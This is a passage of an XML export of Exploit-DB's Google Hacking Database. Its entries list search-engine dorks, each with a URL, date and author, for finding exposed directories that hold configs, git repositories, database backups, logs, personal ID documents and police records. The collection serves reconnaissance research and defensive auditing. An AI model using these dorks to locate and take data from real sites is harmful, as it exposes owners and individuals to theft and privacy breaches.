ManhNho
</textualDescription>
<query>index of /ckeditor</query>
<querystring>https://www.google.com/search?q=index of /ckeditor</querystring>
<edb></edb>
<date>2018-11-15</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5049</id>
<link>https://www.exploit-db.com/ghdb/5049</link>
<category>Sensitive Directories</category>
<shortDescription>index of /etc/certs/</shortDescription>
<textualDescription>certificate directories
ManhNho
</textualDescription>
<query>index of /etc/certs/</query>
<querystring>https://www.google.com/search?q=index of /etc/certs/</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4549</id>
<link>https://www.exploit-db.com/ghdb/4549</link>
<category>Sensitive Directories</category>
<shortDescription>index of /htdocs</shortDescription>
<textualDescription>Which is used to find unauthorised web-servers,and find all sensitive info
through 'htdocs' folder. Also can find xamp servers.
Dagalti Kick</textualDescription>
<query>index of /htdocs</query>
<querystring>https://www.google.com/search?q=index of /htdocs</querystring>
<edb></edb>
<date>2017-07-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4800</id>
<link>https://www.exploit-db.com/ghdb/4800</link>
<category>Sensitive Directories</category>
<shortDescription>index of /node_modules/ -github -stackoverflow</shortDescription>
<textualDescription>Find a several of nodejs folders with important files.
by Franciny Salles(#Bl4kd43m0n)
</textualDescription>
<query>index of /node_modules/ -github -stackoverflow</query>
<querystring>https://www.google.com/search?q=index of /node_modules/ -github -stackoverflow</querystring>
<edb></edb>
<date>2018-04-30</date>
<author>Bl4kd43m0n</author>
</entry>
<entry>
<id>5678</id>
<link>https://www.exploit-db.com/ghdb/5678</link>
<category>Sensitive Directories</category>
<shortDescription>index of /storage/logs/</shortDescription>
<textualDescription>[*] Description: This dork will give you informational Logs of Laravel framework.
[*] Google Dork: index of /storage/logs/
[*] Author: Osman Arif
</textualDescription>
<query>index of /storage/logs/</query>
<querystring>https://www.google.com/search?q=index of /storage/logs/</querystring>
<edb></edb>
<date>2019-12-30</date>
<author>Osman Arif</author>
</entry>
<entry>
<id>5029</id>
<link>https://www.exploit-db.com/ghdb/5029</link>
<category>Sensitive Directories</category>
<shortDescription>index of kcfinder/</shortDescription>
<textualDescription>kcfinder directories
ManhNho
</textualDescription>
<query>index of kcfinder/</query>
<querystring>https://www.google.com/search?q=index of kcfinder/</querystring>
<edb></edb>
<date>2018-11-15</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6265</id>
<link>https://www.exploit-db.com/ghdb/6265</link>
<category>Sensitive Directories</category>
<shortDescription>index of logs.tar</shortDescription>
<textualDescription># Dork: index of logs.tar
# Description: Juicy info</textualDescription>
<query>index of logs.tar</query>
<querystring>https://www.google.com/search?q=index of logs.tar</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>bhumish</author>
</entry>
<entry>
<id>321</id>
<link>https://www.exploit-db.com/ghdb/321</link>
<category>Sensitive Directories</category>
<shortDescription>Index of phpMyAdmin</shortDescription>
<textualDescription>phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the &quot;index of /&quot; method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin.</textualDescription>
<query>intitle:&quot;index of /phpmyadmin&quot; modified</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22index+of+%2Fphpmyadm</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6341</id>
<link>https://www.exploit-db.com/ghdb/6341</link>
<category>Sensitive Directories</category>
<shortDescription>Index of: /services/aadhar card/</shortDescription>
<textualDescription>Google Dork : Index of: /services/aadhar card/
This google dork will list a personal identification.
(Sensitive Information)
#Author : Pratik Khalane
# Date : 27/06/2020
</textualDescription>
<query>Google Dork : Index of: /services/aadhar card/</query>
<querystring>https://www.google.com/search?q=Google Dork : Index of: /services/aadhar card/</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>6315</id>
<link>https://www.exploit-db.com/ghdb/6315</link>
<category>Sensitive Directories</category>
<shortDescription>Index of: /services/pancard/</shortDescription>
<textualDescription># Google dork: Index of: /services/pancard/
# Exploit Author: Harsh Wadhwani
# Description: The dork list out Personally identifiable information on a
# website (Sensitive information)
Regards
</textualDescription>
<query>Index of: /services/pancard/</query>
<querystring>https://www.google.com/search?q=Index of: /services/pancard/</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Harsh Wadhwani</author>
</entry>
<entry>
<id>614</id>
<link>https://www.exploit-db.com/ghdb/614</link>
<category>Sensitive Directories</category>
<shortDescription>index.of.dcim</shortDescription>
<textualDescription>The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets.</textualDescription>
<query>index.of.dcim</query>
<querystring>https://www.google.com/search?q=index.of.dcim&amp;sourceid=mozilla-search&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2004-10-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>39</id>
<link>https://www.exploit-db.com/ghdb/39</link>
<category>Sensitive Directories</category>
<shortDescription>index.of.password</shortDescription>
<textualDescription>These directories are named &quot;password.&quot; I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named &quot;password&quot; and single html files inside named things liks &quot;horny.htm&quot; or &quot;brittany.htm.&quot; These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...</textualDescription>
<query>index.of.password</query>
<querystring>https://www.google.com/search?q=inurl:index.of.password&amp;safe=off&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>337</id>
<link>https://www.exploit-db.com/ghdb/337</link>
<category>Sensitive Directories</category>
<shortDescription>index.of.password</shortDescription>
<textualDescription>These directories are named &quot;password.&quot; I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named &quot;password&quot; and single html files inside named things liks &quot;horny.htm&quot; or &quot;brittany.htm.&quot; These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&amp;func=showcontent&amp;id=380</textualDescription>
<query>index.of.password</query>
<querystring>https://www.google.com/search?q=inurl:index.of.password&amp;safe=off&amp;start=0&amp;</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>6429</id>
<link>https://www.exploit-db.com/ghdb/6429</link>
<category>Sensitive Directories</category>
<shortDescription>Index: /wp-includes/Text/Diff</shortDescription>
<textualDescription>Google Dork : Index: /wp-includes/Text/Diff
Description: This dork will help to find sensitive directories.
(Sensitive Data)
Author : Pratik Khalane
Date: 18/07/2020
</textualDescription>
<query>Index: /wp-includes/Text/Diff</query>
<querystring>https://www.google.com/search?q=Index: /wp-includes/Text/Diff</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>4337</id>
<link>https://www.exploit-db.com/ghdb/4337</link>
<category>Sensitive Directories</category>
<shortDescription>index:&quot;html/js/editor/fckeditor/editor/filemanager/connectors&quot;</shortDescription>
<textualDescription>name =find liferay file page
Google dork Description:
index:&quot;html/js/editor/fckeditor/editor/filemanager/connectors&quot;
Date: 2016-10-2
Author: sultan albalawi
</textualDescription>
<query>index:&quot;html/js/editor/fckeditor/editor/filemanager/connectors&quot;</query>
<querystring>https://www.google.com/search?q=index:&quot;html/js/editor/fckeditor/editor/filemanager/connectors&quot;</querystring>
<edb></edb>
<date>2016-10-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5533</id>
<link>https://www.exploit-db.com/ghdb/5533</link>
<category>Sensitive Directories</category>
<shortDescription>indexof:.htaccess</shortDescription>
<textualDescription>dork:
indexof:.htaccess
Author: Mayur parmar(th3cyb3rc0p)
</textualDescription>
<query>indexof:.htaccess</query>
<querystring>https://www.google.com/search?q=indexof:.htaccess</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>5540</id>
<link>https://www.exploit-db.com/ghdb/5540</link>
<category>Sensitive Directories</category>
<shortDescription>indexof:backup/mysql</shortDescription>
<textualDescription>Dork:
indexof:backup/mysql
Author:
Sanyam Chawla
</textualDescription>
<query>indexof:backup/mysql</query>
<querystring>https://www.google.com/search?q=indexof:backup/mysql</querystring>
<edb></edb>
<date>2019-09-17</date>
<author>Sanyam Chawla</author>
</entry>
<entry>
<id>5547</id>
<link>https://www.exploit-db.com/ghdb/5547</link>
<category>Sensitive Directories</category>
<shortDescription>indexof:backup/web.config</shortDescription>
<textualDescription>Google Dork Description: indexof:backup/web.config
Author Name: Vyshnav nk
</textualDescription>
<query>indexof:backup/web.config</query>
<querystring>https://www.google.com/search?q=indexof:backup/web.config</querystring>
<edb></edb>
<date>2019-09-18</date>
<author>Vyshnav nk</author>
</entry>
<entry>
<id>4627</id>
<link>https://www.exploit-db.com/ghdb/4627</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;/wp-content/uploads/wpsc/&quot;</shortDescription>
<textualDescription>When you dork with this,it will generate juicy information, may have
sensitive information in some cases ,
Regards
Fu2x2000
</textualDescription>
<query>intext:&quot;/wp-content/uploads/wpsc/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;/wp-content/uploads/wpsc/&quot;</querystring>
<edb></edb>
<date>2017-11-30</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>6976</id>
<link>https://www.exploit-db.com/ghdb/6976</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;CAD Media Log&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;CAD Media Log&quot;
# Date: 2021-05-20
# Author: Issac Briones
# This dork reveals online records for computer aided dispatch systems used by police.</textualDescription>
<query>intext:&quot;CAD Media Log&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;CAD Media Log&quot;</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Issac Briones</author>
</entry>
<entry>
<id>410</id>
<link>https://www.exploit-db.com/ghdb/410</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;d.aspx?id&quot; || inurl:&quot;d.aspx?id&quot;</shortDescription>
<textualDescription>&quot;The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.&quot;This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys..</textualDescription>
<query>intext:&quot;d.aspx?id&quot; || inurl:&quot;d.aspx?id&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22d.aspx%3Fid%22+%7C%7C+inurl%3A%22d.aspx%3Fid%22</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5768</id>
<link>https://www.exploit-db.com/ghdb/5768</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;index of /&quot; &quot;.composer-auth.json&quot;</shortDescription>
<textualDescription>intext:&quot;index of /&quot; &quot;.composer-auth.json&quot;
by
Pranshu Tiwari
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;.composer-auth.json&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;.composer-auth.json&quot;</querystring>
<edb></edb>
<date>2020-03-04</date>
<author>Pranshu Tiwari</author>
</entry>
<entry>
<id>4601</id>
<link>https://www.exploit-db.com/ghdb/4601</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;Index of /.git&quot;</shortDescription>
<textualDescription>Google Search:inurl: intext:&quot;Index of /.git&quot;
Explanation:Most of the web-applications are maintained using git
repositories containing important data like
db-info,logs,configs,main-source code,etc. Many of them are forget to hide
or remove the .git directory from live websites.Its can able to expose of
important data.
ThankYou,
*Vishnu Prasad P G*
</textualDescription>
<query>intext:&quot;Index of /.git&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of /.git&quot;</querystring>
<edb></edb>
<date>2017-10-25</date>
<author>Vishnu Prasad P G</author>
</entry>
<entry>
<id>4604</id>
<link>https://www.exploit-db.com/ghdb/4604</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;Index of /database&quot;</shortDescription>
<textualDescription>Explanation: Using this search we can able to get private database details
including SQL and other database elements and contents.
*Jineeb JN*
</textualDescription>
<query>intext:&quot;Index of /database&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Index of /database&quot;</querystring>
<edb></edb>
<date>2017-10-30</date>
<author>Jineeb JN</author>
</entry>
<entry>
<id>4619</id>
<link>https://www.exploit-db.com/ghdb/4619</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;index of /userfiles/file/&quot;</shortDescription>
<textualDescription>When you dork with this,it will generate juicy information to userfiles ,
for best practice filter according to the country .
Regards
Fu2x2000
</textualDescription>
<query>intext:&quot;index of /userfiles/file/&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /userfiles/file/&quot;</querystring>
<edb></edb>
<date>2017-11-27</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>5629</id>
<link>https://www.exploit-db.com/ghdb/5629</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;index of&quot; intext:..bak intext:config</shortDescription>
<textualDescription>Div backup files
Author: Mattias Borg
@mattiasborg82
</textualDescription>
<query>intext:&quot;index of&quot; intext:..bak intext:config</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of&quot; intext:..bak intext:config</querystring>
<edb></edb>
<date>2019-11-07</date>
<author>Mattias Borg</author>
</entry>
<entry>
<id>6290</id>
<link>https://www.exploit-db.com/ghdb/6290</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;INTERNAL USE ONLY&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</shortDescription>
<textualDescription># Google Dork: intext:&quot;INTERNAL USE ONLY&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx
# Sensitive stuff.
# Date: 2020-06-16
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;INTERNAL USE ONLY&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</query>
<querystring>https://www.google.com/search?q=intext:&quot;INTERNAL USE ONLY&quot; ext:doc OR ext:pdf OR ext:xls OR ext:xlsx</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4966</id>
<link>https://www.exploit-db.com/ghdb/4966</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;KRAB-DECRYPT.txt&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription>This a a dork for search sites affected with GrandCrab ransowmare :
[+] Dork : intext:&quot;KRAB-DECRYPT.txt&quot; intitle:&quot;index of&quot;
[+] Linkedin : https://www.linkedin.com/in/mondher-smii/
[+] Author : SMII Mondher
[+] Email : smii.mondher@gmail.com
</textualDescription>
<query>intext:&quot;KRAB-DECRYPT.txt&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;KRAB-DECRYPT.txt&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2018-09-26</date>
<author>SMII Mondher</author>
</entry>
<entry>
<id>4987</id>
<link>https://www.exploit-db.com/ghdb/4987</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;paytm&quot; intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Discovers PayTm config files and open directories of Sites.
PayTm Sensitive Directories Expose on Sites
Google Dork :- intext:”paytm” intitle:”index of”
Date:- 15th Oct, 2018
Exploit Author:- Harsh Mukeshbhai Joshi
</textualDescription>
<query>intext:&quot;paytm&quot; intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;paytm&quot; intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Harsh Mukeshbhai Joshi</author>
</entry>
<entry>
<id>4688</id>
<link>https://www.exploit-db.com/ghdb/4688</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;Powered by ViewVC&quot; | intitle:&quot;ViewVC Repository Listing&quot;</shortDescription>
<textualDescription>intext:&quot;Powered by ViewVC&quot; | intitle:&quot;ViewVC Repository Listing&quot;
ViewVC Repository Listing
ManhNho
</textualDescription>
<query>intext:&quot;Powered by ViewVC&quot; | intitle:&quot;ViewVC Repository Listing&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by ViewVC&quot; | intitle:&quot;ViewVC Repository Listing&quot;</querystring>
<edb></edb>
<date>2018-03-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>719</id>
<link>https://www.exploit-db.com/ghdb/719</link>
<category>Sensitive Directories</category>
<shortDescription>intext:&quot;Powered By: TotalIndex&quot; intitle:&quot;TotalIndex&quot;</shortDescription>
<textualDescription>TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want.</textualDescription>
<query>intext:&quot;Powered By: TotalIndex&quot; intitle:&quot;TotalIndex&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+By%3A+TotalIndex%22+intitle%3A%22TotalIndex%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4613</id>
<link>https://www.exploit-db.com/ghdb/4613</link>
<category>Sensitive Directories</category>
<shortDescription>intext:/wp-content/plugins/woocommerce/templates/emails/plain/</shortDescription>
<textualDescription>When you dork with this,it will generate juciy information in parent
directory , for best practice filter according to the country .
Fu2x2000
</textualDescription>
<query>intext:/wp-content/plugins/woocommerce/templates/emails/plain/</query>
<querystring>https://www.google.com/search?q=intext:/wp-content/plugins/woocommerce/templates/emails/plain/</querystring>
<edb></edb>
<date>2017-11-15</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>4046</id>
<link>https://www.exploit-db.com/ghdb/4046</link>
<category>Sensitive Directories</category>
<shortDescription>intext:index of sym</shortDescription>
<textualDescription>Dork: intext:index of sym
Most of hacker use auto server symlink script and grab all the config file
of the server. Most of the script create a folder that name is sym. All
config file stored in this folder.
Thank You
Atik Rahman</textualDescription>
<query>intext:index of sym</query>
<querystring>https://www.google.com/search?q=intext:index of sym</querystring>
<edb></edb>
<date>2015-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4968</id>
<link>https://www.exploit-db.com/ghdb/4968</link>
<category>Sensitive Directories</category>
<shortDescription>intext:my.cnf intitle:index of</shortDescription>
<textualDescription>intext:my.cnf intitle:index of
This Google Dork discovers servers exposing mysql configuration files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:my.cnf intitle:index of</query>
<querystring>https://www.google.com/search?q=intext:my.cnf intitle:index of</querystring>
<edb></edb>
<date>2018-09-26</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>4967</id>
<link>https://www.exploit-db.com/ghdb/4967</link>
<category>Sensitive Directories</category>
<shortDescription>intext:pure-ftpd.conf intitle:index of</shortDescription>
<textualDescription>intext:pure-ftpd.conf intitle:index of
This Google Dork discovers servers exposing pure-ftpd configuration
files.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>intext:pure-ftpd.conf intitle:index of</query>
<querystring>https://www.google.com/search?q=intext:pure-ftpd.conf intitle:index of</querystring>
<edb></edb>
<date>2018-09-26</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>3857</id>
<link>https://www.exploit-db.com/ghdb/3857</link>
<category>Sensitive Directories</category>
<shortDescription>intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1</shortDescription>
<textualDescription># Exploit Title: google dork for apache directory listing by url edit
# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1
in this query you see that text file but by url we can travel in paren directory
# Date: 11/7/2013
# Exploit Author: james love india
# Tested on: windows xp sp2</textualDescription>
<query>intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1</query>
<querystring>https://www.google.com/search?q=intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7399</id>
<link>https://www.exploit-db.com/ghdb/7399</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;index of backup.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of backup.php&quot;
# Sensitive Directories
# Date:06/10/2021
# Exploit Author: Naman Shah</textualDescription>
<query>intitle: &quot;index of backup.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of backup.php&quot;</querystring>
<edb></edb>
<date>2021-10-06</date>
<author>Naman Shah</author>
</entry>
<entry>
<id>7400</id>
<link>https://www.exploit-db.com/ghdb/7400</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;index of backup.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;index of backup.xml&quot;
# Sensitive Directories
# Date: 06/10/2021
# Exploit Author: Naman Shah</textualDescription>
<query>intitle: &quot;index of backup.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of backup.xml&quot;</querystring>
<edb></edb>
<date>2021-10-06</date>
<author>Naman Shah</author>
</entry>
<entry>
<id>5164</id>
<link>https://www.exploit-db.com/ghdb/5164</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;</shortDescription>
<textualDescription>Search: BitCoin Directory Listing
Google Dorks: intitle: &quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;
Category : Sensitive Directories
Exploit Authors:- Om Ahuja
Jayesh Thakur
Mukul Kulshrestha
Harsh Mukeshbhai Joshi
Sagar Shetty
https://www.inspiraenterprise.com/</textualDescription>
<query>intitle: &quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of&quot; &quot;./&quot; &quot;./bitcoin&quot;</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>5163</id>
<link>https://www.exploit-db.com/ghdb/5163</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;index of&quot; &quot;includes&quot;</shortDescription>
<textualDescription>Exploit : Dorks allow you to access the sensitive directories (includes, wp-includes) using &quot;includes&quot; file.
Google Dork : intitle: &quot;index of&quot; &quot;includes&quot;
Exploit Author:- Jayson Zabate
URL :- https://invalidwebsecurity.info/
</textualDescription>
<query>intitle: &quot;index of&quot; &quot;includes&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of&quot; &quot;includes&quot;</querystring>
<edb></edb>
<date>2019-03-26</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>5908</id>
<link>https://www.exploit-db.com/ghdb/5908</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;index of&quot; &quot;MySQL-Router&quot;</shortDescription>
<textualDescription>#Description : intitle: &quot;index of&quot; &quot;MySQL-Router&quot;
MySQL-Router is a middleware that routes database traffic to back end
database. This Google dork gives us sensitive information such as
information of the users - location, username, ID etc.
#Author: Kartik Adak
#Date: 11 April 2020
</textualDescription>
<query>intitle: &quot;index of&quot; &quot;MySQL-Router&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;index of&quot; &quot;MySQL-Router&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Kartik Adak</author>
</entry>
<entry>
<id>5166</id>
<link>https://www.exploit-db.com/ghdb/5166</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;Index of&quot; intext:log</shortDescription>
<textualDescription>Exploit : File Containing Juicy Info - Dorks allow you to view logs. (e.g.
/log, file/log, ftplogs, server logs)
Google Dork : intitle: “Index of” intext:log
Exploit Author:- Jayson Zabate
URL :- https://invalidwebsecurity.info/
</textualDescription>
<query>intitle: &quot;Index of&quot; intext:log</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Index of&quot; intext:log</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>6606</id>
<link>https://www.exploit-db.com/ghdb/6606</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;Index of&quot; inurl:admin/uploads</shortDescription>
<textualDescription># Google Dork: intitle: &quot;Index of&quot; inurl:admin/uploads
# Sensitive upload contents from Websites.
# Author:SARATH G
</textualDescription>
<query>intitle: &quot;Index of&quot; inurl:admin/uploads</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Index of&quot; inurl:admin/uploads</querystring>
<edb></edb>
<date>2020-10-13</date>
<author>SARATH G</author>
</entry>
<entry>
<id>7237</id>
<link>https://www.exploit-db.com/ghdb/7237</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: &quot;Index of&quot; inurl:fileadmin</shortDescription>
<textualDescription>#Google Dork : intitle: &quot;Index of&quot; inurl:fileadmin
# Sensitive Directories
#Date: 10/07/2021
#Exploit Author : Tanvir Imon</textualDescription>
<query>intitle: &quot;Index of&quot; inurl:fileadmin</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Index of&quot; inurl:fileadmin</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Tanvir Imon</author>
</entry>
<entry>
<id>4177</id>
<link>https://www.exploit-db.com/ghdb/4177</link>
<category>Sensitive Directories</category>
<shortDescription>intitle: Index of /awstats/data</shortDescription>
<textualDescription>Awstats Log file's directory can reveal file/directory location
These logs file may also reveal hosting account usernames,
as awstats keep track of all files and folders traffic stats you can also
get a chance to see some secret.txt or secret.php~
Regards
Devender Mahto
@devendermahto </textualDescription>
<query>intitle: Index of /awstats/data</query>
<querystring>https://www.google.com/search?q=intitle: Index of /awstats/data</querystring>
<edb></edb>
<date>2016-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5011</id>
<link>https://www.exploit-db.com/ghdb/5011</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot; - Revision&quot; + &quot;subversion version&quot;</shortDescription>
<textualDescription>Apache subversion directory listing
ManhNho
</textualDescription>
<query>intitle:&quot; - Revision&quot; + &quot;subversion version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot; - Revision&quot; + &quot;subversion version&quot;</querystring>
<edb></edb>
<date>2018-11-06</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7422</id>
<link>https://www.exploit-db.com/ghdb/7422</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot; index of &quot;/Invoices*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot; index of &quot;/Invoices*&quot;
# Sensitive Directories
# Date:09/10/2021
# Exploit Author: AFFAN AHMED</textualDescription>
<query>intitle:&quot; index of &quot;/Invoices*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot; index of &quot;/Invoices*&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>AFFAN AHMED</author>
</entry>
<entry>
<id>264</id>
<link>https://www.exploit-db.com/ghdb/264</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;album permissions&quot; &quot;Users who can modify photos&quot; &quot;EVERYBODY&quot;</shortDescription>
<textualDescription>Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not &quot;everybody&quot; has modify rights, an attacker can do a search for &quot;users who can see the album&quot; to retrieve valid usernames for the gallery.</textualDescription>
<query>intitle:&quot;album permissions&quot; &quot;Users who can modify photos&quot; &quot;EVERYBODY&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22album+permissions%22+%22Users+who+can+modify+photos%22+%22EVERYBODY%22</querystring>
<edb></edb>
<date>2004-06-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1107</id>
<link>https://www.exploit-db.com/ghdb/1107</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Backup-Management (phpMyBackup v.0.4 beta * )&quot; -johnny.ihackstuff</shortDescription>
<textualDescription>phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP.</textualDescription>
<query>intitle:&quot;Backup-Management (phpMyBackup v.0.4 beta * )&quot; -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle:%22Backup-Management+(phpMyBackup+v.0.4+beta+*+)%22+-johnny.ihackstuff&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6236</id>
<link>https://www.exploit-db.com/ghdb/6236</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Dashboard [Jenkins]&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Dashboard [Jenkins]&quot;
Category: Sensitive Directories
Used to find Jenkins Dashboard
Author Name: Vidhun k
</textualDescription>
<query>intitle:&quot;Dashboard [Jenkins]&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dashboard [Jenkins]&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Vidhun k</author>
</entry>
<entry>
<id>5168</id>
<link>https://www.exploit-db.com/ghdb/5168</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Directory Listing For&quot; &quot;Filename&quot; intext:Tomcat/5.0.28</shortDescription>
